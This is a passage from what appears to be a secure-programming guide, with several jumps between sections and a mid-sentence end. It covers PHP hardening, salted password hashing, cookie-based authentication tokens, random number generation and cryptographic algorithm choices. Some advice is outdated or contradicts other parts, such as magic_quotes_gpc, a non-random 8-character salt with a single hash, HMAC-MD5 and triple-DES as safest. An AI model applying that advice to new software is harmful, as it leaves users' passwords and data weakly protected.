file (single-host), the “.htaccess” file (multi-host), or at the top of the script through the error_reporting
function. I recommend setting the error reporting level in both the php.ini file and also at the top of the
script; that way, you’re protected if (1) you forget to insert the command at the top of the script, or (2)
move the program to another machine and forget to change the php.ini file. Thus, every PHP program
should begin like this:
<?php error_reporting(E_ALL);?>
It could be argued that this error reporting should be turned on during development, but turned off
when actually run on a real site (since such error messages could give useful information to an
attacker). The problem is that if they’re disabled during “actual use” it’s all too easy to leave them
disabled during development. So for the moment, I suggest the simple approach of including it at every
entry point. A much better approach is to record all errors, but direct the error reports so they're
only included in a log file (instead of having them reported to the attacker).
• Filter any user information used to create filenames carefully, in particular to prevent remote file
access. PHP by default comes with “remote files” functionality -- that means that file-opening
commands like fopen(), which in other languages can only open local files, can actually be used to
invoke web or ftp requests from another site.
• Do not use old-style PHP file uploads; use the HTTP_POST_FILES array and related functions. PHP
supports file uploads by uploading the file to some temporary directory with a special filename. PHP
originally set a collection of variables to indicate where that filename was, but since an attacker can
control variable names and their values, attackers could use that ability to cause great mischief.
Instead, always use HTTP_POST_FILES and related functions to access uploaded files. Note that
even in this case, PHP’s approach permits attackers to temporarily upload files to you with arbitrary
content, which is risky by itself.
• Only place protected entry points in the document tree; place all other code (which should be most of
it) outside the document tree. PHP has a history of unfortunate advice on this topic. Originally, PHP
users were supposed to use the “.inc” (include) extension for “included” files, but these included files
often had passwords and other information, and if those files were in the document tree, Apache would
simply give requesters their contents when asked. Then developers gave all files a
“.php” extension - which meant that the contents weren’t seen, but now files never meant to be entry
points became entry points and were sometimes exploitable. As mentioned earlier, the usual security
advice is the best: place only the protected entry points (files) in the document tree, and place other
code (e.g., libraries) outside the document tree. There shouldn’t be any “.inc” files in the document
tree at all.
• Avoid the session mechanism. The “session” mechanism is handy for storing persistent data, but its
current implementation has many problems. First, by default sessions store information in temporary
files - so if you’re on a multi-hosted system, you open yourself up to many attacks and revelations.
Even those who aren’t currently multi-hosted may find themselves multi-hosted later! You can "tie"
this information into a database instead of the filesystem, but if others on a multi-hosted database can
access that database with the same permissions, the problem is the same. There are also ambiguities if
you’re not careful (“is this the session value or an attacker’s value”?) and this is another case where an
attacker can force a file or key to reside on the server with content of their choosing - a dangerous
situation - and the attacker can even control to some extent the name of the file or key where this data
will be placed.
• Use directives to limit privileges (such as safe_mode, disable_functions, and open_basedir), but do not
rely on them. These directives can help limit some simple casual attacks, so they’re worth applying.
However, they’re unlikely to be sufficient to protect against real attacks; they depend only on the
user-space PHP program to do protection, a function it’s not really designed to perform. Instead, you
should employ operating system protections (e.g., running separate processes and users) for serious
protection.
• For all inputs, check that they match a pattern for acceptability (as with any language), and then use
type casting to coerce non-string data into the type it should have. Develop “helper” functions to easily
check and import a selected list of (expected) inputs. PHP is loosely typed, and this can cause trouble.
For example, if an input datum has the value "000", it won’t be equal to "0" nor is it empty(). This is
particularly important for associative arrays, because their indexes are strings; this means that
$data["000"] is different than $data["0"]. For example, to make sure $bar has type double (after
making sure it only has the format legal for a double):
$bar = (double) $bar;
• Be careful of any functions that execute PHP code as strings - make sure attackers cannot control the
string contents. This includes eval(), exec(), include(), passthru(), popen(), preg_replace() when the /e
modifier is used, require(), system(), and the backtick operator.
• Be especially careful of risky functions. For example, this includes functions that open files (e.g.,
fopen(), readfile(), and file()); make sure attackers cannot force the program to open arbitrary files.
Older versions of PHP (prior to 4.3.0) had a buffer overflow vulnerability in the wordwrap() function,
so if you use old versions beware (or even better, upgrade, and make sure your customers upgrade by
checking the version number in the installer).
• Use magic_quotes_gpc() where appropriate - this eliminates many kinds of attacks.
• Avoid file uploads, and consider modifying the php.ini file to disable them (file_uploads = Off). File
uploads have had security holes in the past, so on older PHP’s this is a necessity, and until more
experience shows that they’re safe this isn’t a bad thing to remove. Remember, in general, to secure a
system you should disable or remove anything you don’t need.
Chapter 11. Special Topics
Understanding is a fountain of life to
those who have it, but folly brings
punishment to fools.
Proverbs 16:22 (NIV)
11.1. Passwords
Where possible, don’t write code to handle passwords. In particular, if the application is local, try to
depend on the normal login authentication by a user. If the application is a CGI script, try to depend on
the web server to provide the protection as much as possible - but see below about handling
authentication in a web server. If the application is over a network, avoid sending the password as
cleartext (where possible) since it can be easily captured by network sniffers and reused later.
“Encrypting” a password using some key fixed in the algorithm or using some sort of shrouding
algorithm is essentially the same as sending the password as cleartext.
When transmitting passwords over a network, cryptographically authenticate and encrypt the connection.
(Below we will discuss web authentication, which typically uses SSL/TLS to do this.)
When implementing a system that users log in to using passwords (such as many servers), never store the
passwords as-is (i.e., never store passwords “in the clear”). A common problem today is that attackers
may be able to briefly break into systems, or acquire data backups; in such cases they can then forge
every user account, at least on that system and typically on many others.
Today, the bare-minimum acceptable method for systems that many users log into using passwords is to
use a cryptographic hash that includes per-user salt and uses an intentionally-slow hash function
designed for the purpose. For brevity, these are known as “salted hashes” (though many would use the
term “salted hash” if it only met the first two criteria). Let’s briefly examine what that means, and why
each part is necessary:
• Cryptographic hash: A cryptographic hash function, such as SHA-512, converts data into a
“fingerprint” that is very difficult to invert. If a hash function is used, an attacker cannot just see what
the password is, but instead, must somehow determine the password given the fingerprint.
• Per-user salt: An attacker could counteract simple cryptographic hashes by simply pre-hashing many
common passwords and then seeing if any of those passwords match one of the precomputed hash
values. This can be counteracted by creating, for each user, an additional random value called a salt
that is used as part of the data to be hashed. This data needs to be stored (unencrypted) for each user.
Salt should be generated using a cryptographic pseudo-random number generator, and it should have
at least 128 bits (per NIST SP 800-132).
• Key derivation / iterated functions: The stored value should be created using a key derivation or key
stretching function; such functions are intentionally slightly slow by iterating some operation many
times. This slowness is designed to be irrelevant in normal operation, but the additional cycles greatly
impede attackers who are trying to do password-guessing on a specific higher-value user account. A
key derivation function repeatedly uses a cryptographic hash, a cipher, or HMAC methods. A really
common key derivation function is PBKDF2 (Password-Based Key Derivation Function 2); this is
RSA Laboratories’ Public-Key Cryptography Standards (PKCS) #5 v2.0, RFC 2898, and in
"Recommendation for Password-Based Key Derivation" NIST Special Publication 800-132. However,
PBKDF2 can be implemented rather quickly in GPUs and specialized hardware, and GPUs in
particular are widely available. Today you should prefer iteration algorithms like bcrypt, which is
designed to better counter attackers using GPUs and specialized hardware.
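As a rough sketch of a salted, iterated password hash (assuming OpenSSL's PKCS5_PBKDF2_HMAC; the function
name, salt size, and iteration count here are illustrative, and as noted above an algorithm like bcrypt is
preferable where GPU-equipped attackers are a concern):

#include <openssl/evp.h>
#include <openssl/rand.h>
#include <string.h>

/* Sketch: derive a salted, iterated password hash with PBKDF2-HMAC-SHA512.
   Store (salt, iteration count, hash) per user; never store the password itself. */
int hash_password(const char *password,
                  unsigned char salt[16], unsigned char hash[64],
                  int iterations)
{
    if (RAND_bytes(salt, 16) != 1)   /* per-user random salt (at least 128 bits) */
        return -1;
    if (PKCS5_PBKDF2_HMAC(password, (int) strlen(password),
                          salt, 16, iterations, EVP_sha512(),
                          64, hash) != 1)
        return -1;
    return 0;
}

The per-user record stored by the server would then be the salt, the iteration count, and the resulting hash.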
If your application permits users to set their passwords, check the passwords and permit only “good”
passwords (e.g., not in a dictionary, having certain minimal length, etc.). You may want to look at
information such as http://consult.cern.ch/writeup/security/security_3.html on how to choose a good
password. You should use PAM if you can, because it supports pluggable password checkers.
correctly-working program.
Thus, the most common technique for storing authentication information on the web today is through
cookies. Cookies weren’t really designed for this purpose, but they can be used to support authentication
- but there are many wrong ways to use them that create security vulnerabilities, so be careful. For more
information about cookies, see IETF RFC 2965, along with the older specifications about them. Note
that to use cookies, some browsers (e.g., Microsoft Internet Explorer 6) may insist that you have a
privacy profile (named p3p.xml on the root directory of the server).
Note that some users don’t accept cookies, so this solution still has some problems. If you want to
support these users, you should send this authentication information back and forth via HTML form
hidden fields (since nearly all browsers support them without concern). You’d use the same approach as
with cookies - you’d just use a different technology to have the data sent from the user to the server.
Naturally, if you implement this approach, you need to include settings to ensure that these pages aren’t
cached for use by others. However, while I think avoiding cookies is preferable, in practice these other
approaches often require much more development effort. Since it’s so hard to implement this on a large
scale for many application developers, I’m not currently stressing these approaches. I would rather
describe an approach that is reasonably secure and reasonably easy to implement, than emphasize
approaches that are too hard to implement correctly (by either developers or users). However, if you can
do so without much effort, by all means support sending the authentication information using form
hidden fields and an encrypted link (e.g., SSL/TLS). As with all cookies, for these cookies you should
turn on the HttpOnly flag unless you have a web browser script that must be able to read the cookie.
Fu [2001] discusses client authentication on the web, along with a suggested approach, and this is the
approach I suggest for most sites. The basic idea is that client authentication is split into two parts, a
“login procedure” and “subsequent requests.” In the login procedure, the server asks for the user’s
username and password, the user provides them, and the server replies with an “authentication token”. In
the subsequent requests, the client (web browser) sends the authentication token to the server (along with
its request); the server verifies that the token is valid, and if it is, services the request. Another good
source of information about web authentication is Seifried [2001].
One serious problem with some web authentication techniques is that they are vulnerable to a problem
called "session fixation". In a session fixation attack, the attacker fixes the user’s session ID before the
user even logs into the target server, thus eliminating the need to obtain the user’s session ID afterwards.
Basically, the attacker obtains an account, and then tricks another user into using the attacker’s account -
often by creating a special hypertext link and tricking the user into clicking on it. A good paper
describing session fixation is the paper by Mitja Kolsek [2002]. A web authentication system you use
should be resistant to session fixation.
A good general checklist that covers website authentication is Mark Burnett’s articles on SecurityFocus.
If both the username and password fields are filled in, do not try to automatically log in as that user.
Instead, display the login form with the user and password fields; this lets the user verify that they really
want to log in as that user. If you fail to do this, attackers will be able to exploit this weakness to perform
a session fixation attack. Paranoid systems might want to simply ignore the password field and make the
user fill it in, but this interferes with browsers which can store passwords for users.
When the user sends username and password, it must be checked against the user account database. This
database shouldn’t store the passwords “in the clear”, since if someone got a copy of this database
they’d suddenly get everyone’s password (and users often reuse passwords). Some use crypt() to handle
this, but crypt can only handle a small input, so I recommend using a different approach (this is my
approach - Fu [2001] doesn’t discuss this). Instead, the user database should store a username, salt, and
the password hash for that user. The “salt” is just a random sequence of characters, used to make it
harder for attackers to determine a password even if they get the password database - I suggest an
8-character random sequence. It doesn’t need to be cryptographically random, just different from other
users. The password hash should be computed by concatenating “server key1”, the user’s password, and
the salt, and then running a cryptographically secure hash algorithm. Server key1 is a secret key unique
to this server - keep it separate from the password database. Someone who has server key1 could then
run programs to crack user passwords if they also had the password database; since it doesn’t need to be
memorized, it can be a long and complex password.
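A rough sketch of this hashing scheme (assuming OpenSSL's SHA-256 routines; the function name is
illustrative, and an iterated algorithm such as PBKDF2 or bcrypt, as discussed earlier, is stronger than a
single hash):

#include <openssl/sha.h>
#include <string.h>

/* Sketch: hash = SHA-256(server_key1 || password || salt), as described above. */
void password_hash(const char *server_key1, const char *password,
                   const char *salt, unsigned char hash[SHA256_DIGEST_LENGTH])
{
    SHA256_CTX ctx;

    SHA256_Init(&ctx);
    SHA256_Update(&ctx, server_key1, strlen(server_key1));
    SHA256_Update(&ctx, password, strlen(password));
    SHA256_Update(&ctx, salt, strlen(salt));
    SHA256_Final(hash, &ctx);
}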
Thus, when users create their accounts, the password is hashed and placed in the password database.
When users try to log in, the purported password is hashed and compared against the hash in the database
(they must be equal). When users change their password, they should type in both the old and new
password, and the new password twice (to make sure they didn’t mistype it); and again, make sure none
of these passwords’ characters are visible on the screen.
By default, don’t save the passwords themselves on the client’s web browser using cookies - users may
sometimes use shared clients (say at some coffee shop). If you want, you can give users the option of
“saving the password” on their browser, but if you do, make sure that the password is set to only be
transmitted on “secure” connections, and make sure the user has to specifically request it (don’t do this
by default).
Make sure that the page is marked to not be cached, or a proxy server might re-serve that page to other
users.
Once a user successfully logs in, the server needs to send the client an “authentication token” in a cookie,
which is described next.
exp=t&data=s&digest=m
Where t is the expiration time of the token (say, in several hours), and data s identifies the user (say, the
user name or session id). The digest is a keyed digest of the other fields. Feel free to change the field
name of “data” to be more descriptive (e.g., username and/or sessionid). If you have more than one field
of data (e.g., both a username and a sessionid), make sure the digest uses both the field names and data
values of all fields you’re authenticating; concatenate them with a pattern (say “%%”, “+”, or “&”) that
can’t occur in any of the field data values. As described in a moment, it would be a good idea to include a
username. The keyed digest should be a cryptographic hash of the other information in the token, keyed
using a different server key2. The keyed digest should use HMAC-MD5 or HMAC-SHA1, using a
different server key (key2), though simply using SHA1 might be okay for some purposes (or even MD5,
if the risks are low). Key2 is subject to brute force guessing attacks, so it should be long (say 12+
characters) and unguessable; it does NOT need to be easily remembered. If this key2 is compromised,
anyone can authenticate to the server, but it’s easy to change key2 - when you do, it’ll simply force
currently “logged in” users to re-authenticate. See Fu [2001] for more details.
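As a rough sketch of computing such a keyed digest (using OpenSSL's one-shot HMAC() routine; the key and
field string below are purely illustrative):

#include <openssl/hmac.h>
#include <openssl/evp.h>
#include <stdio.h>
#include <string.h>

/* Sketch: compute HMAC-SHA1 over the concatenated token fields, keyed with
   server key2, and print it as lowercase hex for use as the "digest" field. */
int main(void)
{
    const char *key2 = "example-key2-change-me";       /* illustrative only */
    const char *fields = "exp=t&data=s&client=c";      /* fields being authenticated */
    unsigned char md[EVP_MAX_MD_SIZE];
    unsigned int md_len = 0;

    HMAC(EVP_sha1(), key2, (int) strlen(key2),
         (const unsigned char *) fields, strlen(fields), md, &md_len);

    for (unsigned int i = 0; i < md_len; i++)
        printf("%02x", md[i]);
    printf("\n");
    return 0;
}

The resulting hex string would be placed in the digest field of the token.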
There is a potential weakness in this approach. I have concerns that Fu’s approach, as originally
described, is weak against session fixation attacks (from several different directions, which I don’t want
to get into here). Thus, I now suggest modifying Fu’s approach and using this token format instead:
exp=t&data=s&client=c&digest=m
This differs from the original Fu approach, and older versions of this book (before December 2002)
didn’t suggest it. This modification adds a new "client" field to uniquely identify the client’s current
location/identity. The data in the client field should be something that should change if someone else
tries to use the account; ideally, its new value should be unguessable, though that’s hard to accomplish in
practice. Ideally the client field would be the client’s SSL client certificate, but currently that’s a suggestion
that is hard to meet. At the least, it should be the user’s IP address (as perceived from the server, and
remember to plan for IPv6’s longer addresses). This modification doesn’t completely counter session
fixation attacks, unfortunately (since if an attacker can determine what the user would send, the attacker
may be able to make a request to a server and convince the client to accept those values). However, it
does add resistance to the attack. Again, the digest must now include all the other data.
Here’s an example. If a user logs into foobar.com successfully, you might establish the expiration date as
2002-12-30T1800 (let’s assume we’ll transmit as ASCII text in this format for the moment), the
username as "fred", the client session as "1234", and you might determine that the client’s IP address was
5.6.7.8. If you use a simple SHA-1 keyed digest (and use a key prefixing the rest of the data), with the
server key2 value of "rM!V^m~v*Dzx", the digest could be computed over:
exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8
A keyed digest can be computed by running a cryptographic hash code over, say, the server key2, then
the data; in this case, the digest would be:
101cebfcc6ff86bc483e0538f616e9f5e9894d94
From then on, the server must check the expiration time and recompute the digest of this authentication
token, and only accept client requests if the digest is correct. If there’s no token, the server should reply
with the user login page (with a hidden form field to show where the successful login should go
afterwards).
It would be prudent to display the username, especially on important screens, to help counter session
fixation attacks. If users are given feedback on their username, they may notice if they don’t have their
expected username. This is helpful anyway if it’s possible to have an unexpected username (e.g., a family
that shares the same machine). Examples of important screens include those when a file is uploaded that
should be kept private.
One odd implementation issue: although the specifications for the "Expires:" (expiration time) field for
cookies permit time zones, it turns out that some versions of Microsoft’s Internet Explorer don’t
implement time zones correctly for cookie expiration. Thus, you need to always use UTC time (also
called Zulu time) in cookie expiration times for maximum portability. It’s a good idea in general to use
UTC time for time values, and convert when necessary for human display, since this eliminates other
time zone and daylight savings time issues.
If you include a sessionid in the authentication token, you can limit access further. Your server could
“track” what pages a user has seen in a given session, and only permit access to other appropriate pages
from that point (e.g., only those directly linked from those page(s)). For example, if a user is granted
access to page foo.html, and page foo.html has pointers to resources bar1.jpg and bar2.png, then accesses
to bar4.cgi can be rejected. You could even kill the session, though only do this if the authentication
information is valid (otherwise, this would make it possible for attackers to cause denial-of-service
attacks on other users). This would somewhat limit the access an attacker has, even if they successfully
hijack a session, though clearly an attacker with time and an authentication token could “walk” the links
just as a normal user would.
One decision is whether or not to require the authentication token and/or data to be sent over a secure
connection (e.g., SSL). If you send an authentication token in the clear (non-secure), someone who
intercepts the token could do whatever the user could do until the expiration time. Also, when you send
data over an unencrypted link, there’s the risk of unnoticed change by an attacker; if you’re worried that
someone might change the data on the way, then you need to authenticate the data being transmitted.
Encryption by itself doesn’t guarantee authentication, but it does make corruption more likely to be
detected, and typical libraries can support both encryption and authentication in a TLS/SSL connection.
In general, if you’re encrypting a message, you should also authenticate it. If your needs vary, one
alternative is to create two authentication tokens - one is used only in a “secure” connection for important
operations, while the other used for less-critical operations. Make sure the token used for “secure”
connections is marked so that only secure connections (typically encrypted SSL/TLS connections) are
used. If users aren’t really different, the authentication token could omit the “data” entirely.
Again, make sure that the pages with this authentication token aren’t cached. There are other reasonable
schemes also; the goal of this text is to provide at least one secure solution. Many variations are possible.
numbers, such as values based on radioactive decay (through precise timing of Geiger counter clicks),
atmospheric noise, or thermal noise in electrical circuits. Some computers have a hardware component
that functions as a real random value generator, and if it’s available you should use it.
However, most computers don’t have hardware that generates truly random values, so in most cases you
need a way to generate random numbers that is sufficiently random that an adversary can’t predict it. In
general, this means that you’ll need three things:
• An “unguessable” state; typically this is done by measuring variances in timing of low-level devices
(keystrokes, disk drive arm jitter, etc.) in a way that an adversary cannot control.
• A cryptographically strong pseudo-random number generator (PRNG), which uses the state to
generate “random” numbers.
• A large number of bits (in both the seed and the resulting value used). There’s no point in having a
strong PRNG if you only have a few possible values, because this makes it easy for an attacker to use
brute force attacks. The number of bits necessary varies depending on the circumstance; however, since
these values are often used as cryptographic keys, the normal rules of thumb for keys apply. For a
symmetric key (result), I’d use at least 112 bits (3DES), 128 bits is a little better, and 160 bits or more
is even safer.
Typically the PRNG uses the state to generate some values, and then some of its values and other
unguessable inputs are used to update the state. There are lots of ways to attack these systems. For
example, if an attacker can control or view inputs to the state (or parts of it), the attacker may be able to
determine your supposedly “random” number.
A real danger with PRNGs is that most computer language libraries include a large set of pseudo-random
number generators (PRNGs) which are inappropriate for security purposes. Let me say it again: do not
use typical random number generators for security purposes. Typical library PRNGs are intended for use
in simulations, games, and so on; they are not sufficiently random for use in security functions such as
key generation. Most non-cryptographic library PRNGs are some variation of “linear congruential
generators”, where the “next” random value is computed as "(aX+b) mod m" (where X is the previous
value). Good linear congruential generators are fast and have useful statistical properties, making them
appropriate for their intended uses. The problem with such PRNGs is that future values can be easily
deduced by an attacker (though they may appear random). Other algorithms for generating random
numbers quickly, such as quadratic generators and cubic generators, have also been broken [Schneier
1996]. In short, you have to use cryptographically strong PRNGs to generate random numbers in secure
applications - ordinary random number libraries are not sufficient.
Failing to correctly generate truly random values for keys has caused a number of problems, including
holes in Kerberos, the X window system, and NFS [Venema 1996].
If possible, you should use system services (typically provided by the operating system) that are
expressly designed to create cryptographically secure random values. For example, the Linux kernel
(since 1.3.30) includes a random number generator, which is sufficient for many security purposes. This
random number generator gathers environmental noise from device drivers and other sources into an
entropy pool. When accessed as /dev/random, random bytes are only returned within the estimated
number of bits of noise in the entropy pool (when the entropy pool is empty, the call blocks until
additional environmental noise is gathered). When accessed as /dev/urandom, as many bytes as are
requested are returned even when the entropy pool is exhausted. If you are using the random values for
cryptographic purposes (e.g., to generate a key) on Linux, use /dev/random. *BSD systems also include
/dev/random. Solaris users with the SUNWski package also have /dev/random. Note that if a hardware
random number generator is available and its driver is installed, it will be used instead. More information
is available in the system documentation random(4).
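For example, a minimal sketch (the function name is illustrative, and error handling is kept brief) of reading
cryptographically strong random bytes from /dev/random:

#include <stdio.h>
#include <stddef.h>

/* Sketch: fill buf with n cryptographically strong random bytes from
   /dev/random; returns 0 on success, -1 on failure. May block until the
   kernel has gathered enough environmental noise. */
int get_random_bytes(unsigned char *buf, size_t n)
{
    FILE *f = fopen("/dev/random", "rb");
    size_t got;

    if (f == NULL)
        return -1;
    got = fread(buf, 1, n, f);
    fclose(f);
    return (got == n) ? 0 : -1;
}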
On other systems, you’ll need to find another way to get truly random results. One possibility for other
Unix-like systems is the Entropy Gathering Daemon (EGD), which monitors system activity and hashes
it into random values; you can get it at http://www.lothar.com/tech/crypto. You might consider using a
cryptographic hash function on PRNG outputs. By using a hash algorithm, even if the PRNG turns out to
be guessable, this means that the attacker must now also break the hash function.
If you have to implement a strong PRNG yourself, a good choice for a cryptographically strong (and
patent-unencumbered) PRNG is the Yarrow algorithm; you can learn more about Yarrow from
http://www.counterpane.com/yarrow.html. Some other PRNGs can be useful, but many widely-used ones
have known weaknesses that may or may not matter depending on your application. Before
implementing a PRNG yourself, consult the literature, such as [Kelsey 1998] and [McGraw 2000a]. You
should also examine IETF RFC 1750. NIST has some useful information; see the NIST publication
800-22 and NIST errata. You should know about the diehard tests too. You might want to examine the
paper titled "how Intel checked its PRNG", but unfortunately that paper appears to be unavailable now.
then reused, possibly far in the future). Instead, in Java use char[] to store a password, so it can be
immediately overwritten. In Ada, use type String (an array of characters), and not type
Unbounded_String, to make sure that you have control over the contents.
In many languages (including C and C++), be careful that the compiler doesn’t optimize away the "dead
code" for overwriting the value - since in this case it’s not dead code. Many compilers, including many
C/C++ compilers, remove writes to stores that are no longer used - this is often referred to as "dead store
removal." Unfortunately, if the write is really to overwrite the value of a secret, this means that code that
appears to be correct will be silently discarded. Ada provides the pragma Inspection_Point; place this
after the code erasing the memory, and that way you can be certain that the object containing the secret
will really be erased (and that the overwriting won’t be optimized away).
A Bugtraq post by Andy Polyakov (November 7, 2002) reported that the C/C++ compilers gcc version 3
or higher, SGI MIPSpro, and the Microsoft compilers eliminated simple inlined calls to memset intended
to overwrite secrets. This is allowed by the C and C++ standards. Other C/C++ compilers (such as gcc
less than version 3) preserved the inlined call to memset at all optimization levels, showing that the issue
is compiler-specific. Simply declaring that the destination data is volatile doesn’t help on all compilers;
both the MIPSpro and Microsoft compilers ignored simple "volatilization". Simply "touching" the first
byte of the secret data doesn’t help either; he found that the MIPSpro and GCC>=3 cleverly nullify only
the first byte and leave the rest intact (which is actually quite clever - the problem is that the compiler’s
cleverness is interfering with our goals). One approach that seems to work on all platforms is to write
your own implementation of memset with internal "volatilization" of the first argument (this code is
based on a workaround proposed by Michael Howard):
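A minimal sketch of such a function in C (the body here is illustrative and may differ from Howard's original
code):

#include <stddef.h>

/* Sketch: memset replacement whose writes go through a volatile pointer, so
   the compiler cannot treat the overwrite of a secret as a dead store. */
void *guaranteed_memset(void *v, int c, size_t n)
{
    volatile unsigned char *p = v;
    while (n--)
        *p++ = (unsigned char) c;
    return v;
}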
Then place this definition into an external file to force the function to be external (define the function in a
corresponding .h file, and #include the file in the callers, as is usual). This approach appears to be safe at
any optimization level (even if the function gets inlined).
secure. When you must create anything, give the approach wide public review and make sure that
professional security analysts examine it for problems. In particular, do not create your own encryption
algorithms unless you are an expert in cryptology, know what you’re doing, and plan to spend years in
professional review of the algorithm. Creating encryption algorithms (that are any good) is a task for
experts only.
A number of algorithms are patented; even if the owners permit “free use” at the moment, without a
signed contract they can always change their minds later, putting you at extreme risk later. In general,
avoid all patented algorithms - in most cases there’s an unpatented approach that is at least as good or
better technically, and by doing so you avoid a large number of legal problems.
Another complication is that many countries regulate or restrict cryptography in some way. A survey of
legal issues is available at the “Crypto Law Survey” site, http://rechten.kub.nl/koops/cryptolaw/.
Often, your software should provide a way to reject “too small” keys, and let the user set what “too
small” is. For RSA keys, 512 bits is too small for use. There is increasing evidence that 1024 bits for
RSA keys is not enough either; Bernstein has suggested techniques that simplify brute-forcing RSA, and
other work based on it (such as Shamir and Tromer’s "Factoring Large Numbers with the TWIRL
device") now suggests that 1024 bit keys can be broken in a year by a $10 Million device. You may want
to make 2048 bits the minimum for RSA if you really want a secure system. For more about RSA
specifically, see RSA’s commentary on Bernstein’s work. For a more general discussion of key length and
other general cryptographic algorithm issues, see NIST’s key management workshop in November 2001.
• Internet Protocol Security (IPSec). IPSec provides encryption and/or authentication at the IP packet
level. However, IPSec is often used in a way that only guarantees authenticity of two communicating
hosts, not of the users. As a practical matter, IPSec usually requires low-level support from the
operating system (which not all implement) and an additional keyring server that must be configured.
Since IPSec can be used as a "tunnel" to secure packets belonging to multiple users and multiple hosts,
it is especially useful for building a Virtual Private Network (VPN) and connecting a remote machine.
As of this time, it is much less often used to secure communication from individual clients to servers.
The new version of the Internet Protocol, IPv6, comes with IPSec “built in,” but IPSec also works with
the more common IPv4 protocol. Note that if you use IPSec, don’t use the encryption mode without
the authentication, because the authentication also acts as integrity protection.
• Secure Socket Layer (SSL) / TLS. SSL/TLS works over TCP and tunnels other protocols using TCP,
adding encryption, authentication of the server, and optional authentication of the client (but
authenticating clients using SSL/TLS requires that clients have configured X.509 client certificates,
something rarely done). SSL version 3 is widely used; TLS is a later adjustment to SSL that
strengthens its security and improves its flexibility. Currently there is a slow transition going on from
SSLv3 to TLS, aided because implementations can easily try to use TLS and then back off to SSLv3
without user intervention. Unfortunately, a few bad SSLv3 implementations cause problems with the
backoff, so you may need a preferences setting to allow users to skip using TLS if necessary. Don’t
use SSL version 2, it has some serious security weaknesses.
SSL/TLS is the primary method for protecting http (web) transactions. Any time you use an "https://"
URL, you’re using SSL/TLS. Other protocols that often use SSL/TLS include POP3 and IMAP.
SSL/TLS usually use a separate TCP/IP port number from the unsecured port, which the IETF is a
little unhappy about (because it consumes twice as many ports; there are solutions to this). SSL is
relatively easy to use in programs, because most library implementations allow programmers to use
operations similar to the operations on standard sockets like SSL_connect(), SSL_write(), SSL_read(),
etc. A widely used OSS/FS implementation of SSL (as well as other capabilities) is OpenSSL,
available at http://www.openssl.org.
• OpenPGP and S/MIME. There are two competing, essentially incompatible standards for securing
email: OpenPGP and S/MIME. OpenPGP is based on the PGP application; an OSS/FS
implementation is GNU Privacy Guard from http://www.gnupg.org. Currently, their certificates are
often not interchangeable; work is ongoing to repair this.
• SSH. SSH is the primary method of securing “remote terminals” over an internet, and it also includes
methods for tunneling X Windows sessions. However, it’s been extended to support single sign-on and
general secure tunneling for TCP streams, so it’s often used for securing other data streams too (such
as CVS accesses). The most popular implementation of SSH is OpenSSH http://www.openssh.com,
which is OSS/FS. Typical uses of SSH allow the client to authenticate that the server is truly the
server, and then the user enters a password to authenticate the user (the password is encrypted and sent
to the other system for verification). Current versions of SSH can store private keys, allowing users to
not enter the password each time. To prevent man-in-the-middle attacks, SSH records keying
information about servers it talks to; that means that typical use of SSH is vulnerable to a
man-in-the-middle attack during the very first connection, but it can detect problems afterwards. In
contrast, SSL generally uses a certificate authority, which eliminates the first connection problem but
requires special setup (and payment!) to the certificate authority.
• Kerberos. Kerberos is a protocol for single sign-on and authenticating users against a central
authentication and key distribution server. Kerberos works by giving authenticated users "tickets",
granting them access to various services on the network. When clients then contact servers, the servers
can verify the tickets. Kerberos is a primary method for securing and supporting authentication on a
LAN, and for establishing shared secrets (thus, it needs to be used with other algorithms for the actual
protection of communication). Note that to use Kerberos, both the client and server have to include
code to use it, and since not everyone has a Kerberos setup, this has to be optional - complicating the
use of Kerberos in some programs. However, Kerberos is widely used.
Many of these protocols allow you to select a number of different algorithms, so you’ll still need to pick
reasonable defaults for algorithms (e.g., for encryption).
analyzed it and not found any serious weakness in it, and I believe it has been through enough analysis to
be trustworthy now. In August 2002 researchers Fuller and Millar discovered a mathematical property of
the cipher that, while not an attack, might be exploitable and turned into an attack (the approach may
actually have serious consequences for some other algorithms, too). However, heavy-duty worldwide
analysis has yet to provide serious evidence that AES is actually vulnerable (see [Landau 2004] for more
technical information on Rijndael). It’s always worth staying tuned for future work, of course. A good
alternative to AES is the Serpent algorithm, which is slightly slower but is very resistant to attack. For
many applications triple-DES is a very good encryption algorithm; it has a reasonably lengthy key (112
bits), no patent issues, and a very long history of withstanding attacks (it’s withstood attacks far longer
than any other encryption algorithm with reasonable key length in the public literature, so it’s probably
the safest publicly-available symmetric encryption algorithm when properly implemented). However,
triple-DES is very slow when implemented in software, so triple-DES can be considered “safest but
slowest.” Twofish appears to be a good encryption algorithm, but there are some lingering questions -
Sean Murphy and Fauzan Mirza showed that Twofish has properties that cause many academics to be
concerned (though as of yet no one has managed to exploit these properties). MARS is highly resistant to
“new and novel” attacks, but it’s more complex and is impractical on limited-capability smartcards. For the
moment I would avoid Twofish - it’s quite likely that this will never be exploitable, but it’s hard to be
sure and there are alternative algorithms which don’t have these concerns. Don’t use IDEA - it’s subject
to U.S. and European patents. Don’t use stupid algorithms such as XOR with a constant or constant
string, the ROT (rotation) scheme, the Vigenère cipher, and so on - these can be trivially broken with
today’s computers. Don’t use “double DES” (using DES twice) - that’s subject to a “man in the middle”
attack that triple-DES avoids. Your protocol should support multiple encryption algorithms, anyway; that
way, when an encryption algorithm is broken, users can switch to another one.
For symmetric-key encryption (e.g., for bulk encryption), don’t use a key length less than 90 bits if you
want the information to stay secret through 2016 (add another bit for every additional 18 months of
security) [Blaze 1996]. For encrypting worthless data, the old DES algorithm has some value, but with
modern hardware it’s too easy to break DES’s 56-bit key using brute force. If you’re using DES, don’t
just use the ASCII text key as the key - parity is in the least (not most) significant bit, so most DES
algorithms will encrypt using a key value well-known to adversaries; instead, create a hash of the key
and set the parity bits correctly (and pay attention to error reports from your encryption routine).
So-called “exportable” encryption algorithms only have effective key lengths of 40 bits, and are
essentially worthless; in 1996 an attacker could spend $10,000 to break such keys in twelve minutes or
use idle computer time to break them in a few days, with the time-to-break halving every 18 months in
either case.
Block encryption algorithms can be used in a number of different modes, such as “electronic code book”
(ECB) and “cipher block chaining” (CBC). In nearly all cases, use CBC, and do not use ECB mode - in
ECB mode, the same block of data always returns the same result inside a stream, and this is often
enough to reveal what’s encrypted. Many modes, including CBC mode, require an “initialization vector”
(IV). The IV doesn’t need to be secret, but it does need to be unpredictable by an attacker. Don’t reuse
IV’s across sessions - use a new IV each time you start a session.
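As a rough sketch of these recommendations (using OpenSSL's EVP interface; the key size and function name are
illustrative), CBC encryption with a fresh, unpredictable IV might look like the following. The IV is not
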